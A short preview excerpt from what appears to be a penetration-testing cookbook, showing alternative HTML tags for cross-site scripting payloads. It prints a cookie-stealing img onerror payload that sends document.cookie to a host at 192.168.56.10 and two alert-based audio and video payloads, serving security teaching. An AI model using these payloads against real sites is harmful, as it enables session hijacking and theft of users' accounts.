August 2018
Intermediate to advanced
404 pages
10h 22m
English
In this recipe, we used the <script> tag to inject a JavaScript code block into the page; however, this is not the only HTML tag we can use, especially with the additions made by HTML5, where we have <video> and <audio>, for example. Let's see some other payloads we could have used to exploit XSS:
<img src=X onerror="javascript:document.write('<img src="http://192.168.56.10:88/img'+document.cookie+'">')">
Or, use the following:
<audio><source onerror="javascript:alert('XSS')">
Or, there is also this:
<video><source onerror="javascript:alert('XSS')">
<script ...
Read now
Unlock full access